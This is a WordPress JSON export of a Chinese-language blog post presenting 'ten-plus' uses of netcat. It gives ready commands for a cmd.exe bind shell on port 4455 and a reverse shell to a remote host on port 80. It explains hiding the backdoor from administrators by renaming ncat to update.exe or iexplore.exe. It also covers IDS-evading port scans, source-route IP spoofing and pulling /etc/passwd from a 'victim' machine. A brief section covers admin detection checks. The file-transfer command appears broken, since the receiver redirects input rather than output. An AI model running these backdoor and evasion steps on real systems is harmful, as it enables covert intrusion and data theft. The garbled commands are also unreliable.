{"id":146,"date":"2019-05-10T16:22:09","date_gmt":"2019-05-10T08:22:09","guid":{"rendered":"http:\/\/limitironbox.myds.me\/wordpress\/?p=146"},"modified":"2020-05-22T16:26:15","modified_gmt":"2020-05-22T08:26:15","slug":"%e7%b6%b2%e8%b7%af%e6%b8%ac%e8%a9%a6%e7%9a%84%e7%91%9e%e5%a3%ab%e5%88%80-netcat-%e7%9a%8410%e7%a8%ae%e4%bd%bf%e7%94%a8%e6%96%b9%e6%b3%95","status":"publish","type":"post","link":"https:\/\/limitironbox.myds.me\/wordpress\/%e7%b6%b2%e8%b7%af%e6%b8%ac%e8%a9%a6%e7%9a%84%e7%91%9e%e5%a3%ab%e5%88%80-netcat-%e7%9a%8410%e7%a8%ae%e4%bd%bf%e7%94%a8%e6%96%b9%e6%b3%95\/","title":{"rendered":"\u7db2\u8def\u6e2c\u8a66\u7684\u745e\u58eb\u5200 NETCAT \u768410+\u7a2e\u4f7f\u7528\u65b9\u6cd5"},"content":{"rendered":"<header class=\"entry-header\">\n<h2 class=\"entry-title\"><img decoding=\"async\" style=\"font-family: 'Exo 2', sans-serif; font-size: 1rem; font-weight: 300;\" src=\"https:\/\/i.imgur.com\/gHw2Q50.gif\" alt=\"\" \/><\/h2>\n<\/header>\n<div class=\"entry-content\">\n<p>\u56e0\u70ba NETCat \u662f\u4e00\u500b\u5f88\u5c0f\u7684\u57f7\u884c\u5de5\u5177\uff0c\u53ef\u4ee5\u7528\u5728client\/server\u7684\u8a31\u591a\u4e0d\u540c\u60c5\u5883\u4e0b\u7684\u6e9d\u901a\uff0c<\/p>\n<p>\u56e0\u70ba\u4e5f\u5e38\u88ab\u99ed\u5ba2\u7528\u4f86\u505a\u7db2\u8def\u5de5\u5177\u6216\u662f\u7db2\u8def\u5075\u6e2c\u7684\u5de5\u5177\u3002<\/p>\n<p>\u4f8b\u5982\uff1a\u958b\u555f\u5f8c\u9580\u3001\u9060\u7aef\u57f7\u884c\u3001\u6383\u63cf\u7db2\u8def\u3001\u6a94\u6848\u50b3\u8f38\u7b49\uff0c\u90fd\u53ef\u4ee5\u900f\u904e NETCat\u5b8c\u6210\u3002<\/p>\n<h2>NetCAT \u4e0b\u8f09<\/h2>\n<p>&nbsp;<\/p>\n<ul>\n<li><a href=\"http:\/\/netcat.sourceforge.net\/download.php\">http:\/\/netcat.sourceforge.net\/download.php<\/a><\/li>\n<li><a href=\"https:\/\/nmap.org\/ncat\/\">https:\/\/nmap.org\/ncat\/<\/a><\/li>\n<\/ul>\n<ul>\n<li><b>Latest release self-installer:<\/b>\u00a0<a href=\"https:\/\/nmap.org\/dist\/nmap-6.49BETA5-setup-xp.exe\">nmap-6.49BETA5-setup-xp.exe<\/a><\/li>\n<li><strong>\u57f7\u884c\u7a0b\u5f0f\u9700\u5b89\u88ddVIsual C++ 2013 x86<\/strong><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h2>\u00a0\u5f8c\u9580\u7a0b\u5f0f or \u9060\u7aef\u57f7\u884c<\/h2>\n<p><img decoding=\"async\" src=\"http:\/\/blog.teesupport.com\/wp-content\/uploads\/2011\/07\/backdoor.png\" alt=\"\" \/><\/p>\n<p>\u5982\u679c\u6211\u5011\u5e0c\u671b \u00a010.0.0.1\u9019\u53f0\u96fb\u8166\u53ef\u4ee5\u900f\u904e port 4455 \u88ab\u9060\u7aef\u9023\u7dda\u4e4b\u5f8c\u53ef\u4ee5\u57f7\u884c Command line \u6307\u4ee4\uff0c<\/p>\n<p>\u90a3\u9ebc\u53ea\u8981\u572810.0.0.1\u9019\u53f0\u96fb\u8166A\u57f7\u884c netCat<\/p>\n<table>\n<tbody>\n<tr>\n<td>C:\\&gt; ncat \u00a0-l \u00a0 \u00a0-e \u00a0cmd.exe \u00a010.0.0.1 \u00a0 4455<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u6216\u662f<\/p>\n<p>&nbsp;<\/p>\n<table width=\"359\">\n<tbody>\n<tr>\n<td>C:\\&gt; ncat.exe \u2013k -l \u2013e cmd.exe 4455<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>\u56e0\u6b64\u9060\u7aef\u96fb\u8166\u53ea\u8981\u9023\u7dda\u9053\u8a72 10.0.0.1 port 4455 \u5c31\u53ef\u4ee5\u57f7\u884c 10.0.0.1\u7684 command line<\/p>\n<p>\u9019\u5c31\u662f\u4fd7\u7a31\u7684 Back Door\u5f8c\u9580\u7a0b\u5f0f\uff0c\u8b93\u9060\u7aef\u96fb\u8166\u53ef\u4ee5\u9023\u7dda\u5f8c\u57f7\u884c\u7279\u5b9a\u6307\u4ee4\u3002<\/p>\n<p>\u9060\u7aef\u96fb\u8166B\u57f7\u884c netCat \u9023\u7dda<\/p>\n<table width=\"249\">\n<tbody>\n<tr>\n<td>ncat.exe \u00a0 10.0.0.1 \u00a04455<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u9023\u7dda\u6210\u529f\u5f8c\u5c31\u53ef\u4ee5\u57f7\u884c\u4efb\u4f55 Command line \u4e0b\u7684\u6307\u4ee4<\/p>\n<p>&nbsp;<\/p>\n<h2>\u96b1\u85cf NetCAT.exe<\/h2>\n<p>\u7531\u65bc\u57f7\u884c ncat.exe \u5f88\u5bb9\u6613\u5728 Task Manager \u88ab\u767c\u73fe\uff0c\u56e0\u6b64\u901a\u5e38\u99ed\u5ba2\u57f7\u884c\u9019\u500b\u5de5\u5177\u6703\u5c07\u6a94\u540d\u6539\u8b8a\u3002\u907f\u514d\u88ab\u7cfb\u7d71\u7ba1\u7406\u8005\u767c\u73fe\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.javcasta.com\/blog\/wp-content\/uploads\/2010\/09\/TaskManager.jpg\" alt=\"\" \/><\/p>\n<p>\u4f8b\u5982\uff0c\u5c07 NetCAT.exe \u66f4\u6539\u6a94\u540d\u70ba update.exe \u4e26\u4e14\u653e\u5230\u7cfb\u7d71\u76ee\u9304\uff0c\u518d\u57f7\u884c\u5f8c\u9580\u7a0b\u5f0f\u3002<\/p>\n<table width=\"691\">\n<tbody>\n<tr>\n<td>C:\\&gt; move ncat.exe \u00a0 \u00a0c:\\Windows\\System32\\Drivers\\update.exe\u00a0C:\\&gt; Windows\\System32\\Drivers\\update.exe\u00a0\u2013k -l \u2013e cmd.exe 4455<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u6216\u662f\u5229\u7528 \u6bd4\u8f03\u4e0d\u6703\u88ab\u5bdf\u89ba\u7684 port 80<\/p>\n<table width=\"725\">\n<tbody>\n<tr>\n<td>C:\\&gt; mkdir C:\\Windows\\System32\\Drivers\\qC:\\&gt; move ncat.exe \u00a0 \u00a0C:\\Windows\\System32\\Drivers\\q\\iexplore.exeC:\\&gt; cd Windows\\System32\\Drivers\\q<\/p>\n<p>C:\\WINDOWS\\System32\\DRIVERS\\q\\&gt;\u00a0iexplore.exe\u00a0-e cmd.exe hostname 80<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u5982\u6b64\u4e00\u4f86\u770b\u8d77\u4f86\u5c31\u6703\u50cf\u662f\u00a0 Internet Explorer\u8981\u900f\u904e port 80 \u9023\u7dda HTTP<\/p>\n<h2>\u7cfb\u7d71\u7ba1\u7406\u8005\u5c0d\u65bc NetCAT\u7684\u57fa\u672c\u6aa2\u67e5<\/h2>\n<p>\u53e6\u4e00\u65b9\u9762\u8b93\u6211\u5011\u770b\u770b\u7cfb\u7d71\u7ba1\u7406\u8005\u53ef\u4ee5\u505a\u54ea\u4e9b\u57fa\u672c\u6aa2\u5bdf\uff0c\u9a57\u8b49\u662f\u5426\u6709\u88ab\u57f7\u884c\u5f8c\u9580\u7a0b\u5f0f or NetCAT\u5462?<\/p>\n<h3>Task Manager<\/h3>\n<p>\u67e5\u770b\u662f\u5426\u6709 nc.exe \u00a0NetCAT.exe \u00a0ncat.exe\u7684\u7a0b\u5e8f\u6b63\u518d\u57f7\u884c\u3002\u7576\u7136\u5982\u679c\u8a72\u7a0b\u5e8f\u5df2\u7d93\u88ab\u66f4\u6539\u6a94\u540d\uff0c\u5c31\u7121\u6cd5\u900f\u904e\u9019\u500b\u65b9\u5f0f\u5f97\u77e5\u3002<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.javcasta.com\/blog\/wp-content\/uploads\/2010\/09\/TaskManager.jpg\" alt=\"\" \/><\/p>\n<h3>Netstat \u67e5\u770b port \u7684\u57f7\u884c\u72c0\u6cc1<\/h3>\n<p>\u67e5\u770b\u54ea\u4e9b port\u6b63\u5728 listening<\/p>\n<table>\n<tbody>\n<tr>\n<td>netstat \u00a0-nab<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"\" src=\"http:\/\/cdn.ttgtmedia.com\/digitalguide\/images\/Misc\/wf_1.jpg\" alt=\"\" width=\"534\" height=\"396\" \/><\/p>\n<h2>Port Scanning<\/h2>\n<p>\u5118\u7ba1 NetCAT \u4e3b\u8981\u7684\u529f\u80fd\u4e0d\u662f\u7528\u4f86\u505a port Scanning\uff0c\u9084\u662f\u53ef\u4ee5\u7528 NetCAT \u505a\u57fa\u672c port\u7684\u6383\u63cf\u3002<\/p>\n<table width=\"639\">\n<tbody>\n<tr>\n<td>$ nc -z 10.0.0.1 \u00a020-80Connection to 10.0.0.1 \u00a022 port [tcp\/ssh] succeeded!<\/p>\n<p>Connection to 10.0.0.1 80 port [tcp\/http] succeeded!<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u7531\u65bc\u9019\u6a23\u7684port scanning \u7db2\u8def\u884c\u70ba\u5f88\u5bb9\u6613\u88ab IDS \u767c\u73fe\uff0c\u56e0\u6b64\u53ef\u4ee5\u52a0\u5165\u4e00\u4e9b\u5176\u4ed6\u53c3\u6578\u6e1b\u5c11\u88ab IDS\u5075\u6e2c\u5230\u7684\u6a5f\u7387<\/p>\n<p>r: \u00a0\u96a8\u6a5f\u6383\u7784<\/p>\n<p>-i: \u6bcf\u9694 30\u79d2\uff0c\u6383\u63cf\u4e00\u500b port<\/p>\n<table>\n<tbody>\n<tr>\n<td>$ nc -v -z\u00a0-r -i 30\u00a010.0.0.1 \u00a0\u00a020-80<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<h2>Port Scanning \u57fa\u672c\u539f\u7406<\/h2>\n<p>port scanning \u4e3b\u8981\u5229\u7528 TCP \u9023\u7dda\u6642\u7684\u57fa\u672c\u539f\u7406 3-way handshake \uff0c\u900f\u904e3-way handshake \u7684\u56de\u61c9\u4f86\u5224\u65b7\u9060\u7aef\u96fb\u8166 port \u662f\u5426\u6709\u958b\u555f\u3002<\/p>\n<p>\u7c21\u55ae\u4f86\u8aaa\uff1a\u5982\u679c port\u6709\u901a\u7684\u8a71\u4e00\u5b9a\u6703\u6709 \u201cSYN\/ACK\u201d\u7684\u56de\u8986\u3002\u5982\u679c\u6c92\u6709\u56de\u8986\u6216\u662f\u56de\u8986\u5176\u4ed6\u7684\u72c0\u614b RST\u90fd\u8868\u793a port \u6c92\u6709\u901a\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/fadils.files.wordpress.com\/2008\/06\/3-way-hs.jpg\" alt=\"\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>\u4f8b\u5982\u4e0b\u5716\uff0c\u9060\u7aefServer\u96fb\u8166\u56de\u8986 \u201cRST\u201d\uff0c\u8868\u793a port \u6c92\u6709\u901a\u3002<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"\" src=\"http:\/\/resources.infosecinstitute.com\/wp-content\/uploads\/101613_1123_PortScannin2.jpg\" alt=\"\" width=\"468\" height=\"209\" \/><\/p>\n<p>\u4f8b\u5982\u4e0b\u5716\uff0c\u9060\u7aefServer\u96fb\u8166\u56de\u8986 \u201cSYN+ACK\u201d\uff0c\u8868\u793a port \u6709\u901a\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"\" src=\"http:\/\/img.wonderhowto.com\/img\/36\/13\/63578617777373\/0\/build-stealth-port-scanner-with-scapy-and-python.w654.jpg\" alt=\"\" width=\"455\" height=\"203\" \/><\/p>\n<h2>UDP port Scanning<\/h2>\n<p>\u9019\u662f TCP\u7684\u7279\u6027\uff0c\u90a3\u9ebcUDP\u53ef\u4ee5\u9019\u6a23\u505a\u55ce?<\/p>\n<p>\u5118\u7ba1\u6211\u5011\u53ef\u4ee5\u900f\u904e\u4e0b\u5217\u6307\u4ee4\u5c0d\u65bc UDP port \u4f5c\u6383\u63cf\uff0c\u4f46\u662f UDP\u7684\u6383\u63cf\u76f8\u5c0d\u6703\u6709\u4e0d\u6e96\u78ba\u7684\u72c0\u6cc1\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td>nc -v -z -r\u00a0-u\u00a0-i 30 10.1.1.1 \u00a0\u00a020-80<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>\u5c0d\u65bcUDP port \u662f\u5426\u6709\u901a\uff0c NC \u4e3b\u8981\u900f\u904e Internet Control Message Protocol (ICMP) \u7684\u932f\u8aa4\u8a0a\u606f\u4f86\u5224\u65b7\uff0c<\/p>\n<p>\u4f46\u662f\u8a31\u591a\u7684\u9632\u706b\u7246\u6703\u8a2d\u5b9a\u4e0d\u56de\u8986 ICMP\uff0c\u9019\u6703\u9020\u6210\u6383\u63cf\u7684\u7d50\u679c\u8aa4\u5224\u7684\u6a5f\u7387\u63d0\u9ad8\u3002<\/p>\n<h2>\u9060\u7aef\u4e3b\u6a5f\u7684\u670d\u52d9\u8cc7\u8a0a<\/h2>\n<p>\u77e5\u9053\u54ea\u4e9b port \u6709\u901a\u6c92\u6709\u901a\u4e4b\u5f8c\uff0c\u53ef\u4ee5\u9032\u4e00\u6b65\u7372\u53d6\u6bcf\u500b port \u7684\u670d\u52d9\u8cc7\u8a0a\u3002\u4f8b\u5982\u662f\u4f7f\u7528\u54ea\u7a2e Web server or FTP server<\/p>\n<table>\n<tbody>\n<tr>\n<td>$ echo QUIT | nc -v 10.1.1.1 \u00a0 \u00a021 22 80<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td>$nc -v 10.1.1.1 \u00a0\u00a080<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5982\u8207 syslog\u6e9d\u901a<\/p>\n<table>\n<tbody>\n<tr>\n<td>$ echo \u201c0I can speak syslog\u201d | nc -u 10.1.1.1 \u00a0514<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<h2>\u507d\u9020 IP<\/h2>\n<p>NetCAT \u9084\u53ef\u4ee5\u8b8a\u9020\u904e\u7a0b\u4e2d\u7d93\u904e\u7684\u7d50\u9ede IP\u3002<\/p>\n<p>\u4f8b\u5982\u9019\u500b\u4f8b\u5b50\uff0c\u6700\u7d42\u76ee\u7684\u5730\u70ba 10.1.1.1 \u7684 port 23\u3002\u4f46\u662f\u4e2d\u9593\u7684\u7d50\u9ede\u8b8a\u9020\u7d93\u904e\u4e86 10.10.4.5 \u202610.10.5.8 \u7b49<\/p>\n<table width=\"712\">\n<tbody>\n<tr>\n<td>nc\u00a0\u2013g\u00a010.10.4.5\u00a0\u2013g\u00a010.10.5.8\u00a0\u2013g\u00a010.10.7.4\u00a0\u2013g\u00a010.10.9.9 \u00a0 \u00a0 10.1.1.1 \u00a0 23<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<h2>\u6a94\u6848\u7684\u50b3\u8f38<\/h2>\n<p>\u53ef\u4ee5\u900f\u904e NetCAT \u5c07\u9060\u7aef\u96fb\u8166\u7684\u6a5f\u5bc6\u6a94\u6848\u56de\u50b3\u3002\u4f8b\u5982\u7cfb\u7d71\u9810\u8a2d\u7684\u5bc6\u78bc\u6a94\u6848\u3002<\/p>\n<p>\u9060\u7aef\u96fb\u8166 (\u53d7\u5bb3\u8005\u96fb\u8166)<\/p>\n<table>\n<tbody>\n<tr>\n<td>$ nc \u2013l \u2013u 55555 &lt; file_we_want<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table width=\"411\">\n<tbody>\n<tr>\n<td>$ nc \u2013l \u2013u 55555 &lt; \/etc\/passwd<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u99ed\u5ba2\u96fb\u8166<\/p>\n<table>\n<tbody>\n<tr>\n<td>nc \u2013u \u2013targethost 55555 &lt; copy_of_file<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>NetCat \u7684\u7528\u9014\u5f88\u5ee3\u6cdb\uff0c\u4e5f\u5c31\u662f\u70ba\u4ec0\u9ebc\u88ab\u8996\u70ba\u99ed\u5ba2\u5de5\u5177\u7684\u745e\u58eb\u5c0f\u5200\uff0c<\/p>\n<p>\u7576\u7136\u4e5f\u88ab\u9632\u6bd2\u8edf\u9ad4\u8996\u70ba\u662f\u5f8c\u9580\u7a0b\u5f0f\u7981\u6b62\u57f7\u884c\u3002<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u56e0\u70ba NETCat \u662f\u4e00\u500b\u5f88\u5c0f\u7684\u57f7\u884c\u5de5\u5177&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"pmpro_default_level":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/posts\/146"}],"collection":[{"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/comments?post=146"}],"version-history":[{"count":3,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/posts\/146\/revisions"}],"predecessor-version":[{"id":154,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/posts\/146\/revisions\/154"}],"wp:attachment":[{"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/media?parent=146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/categories?post=146"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/tags?post=146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}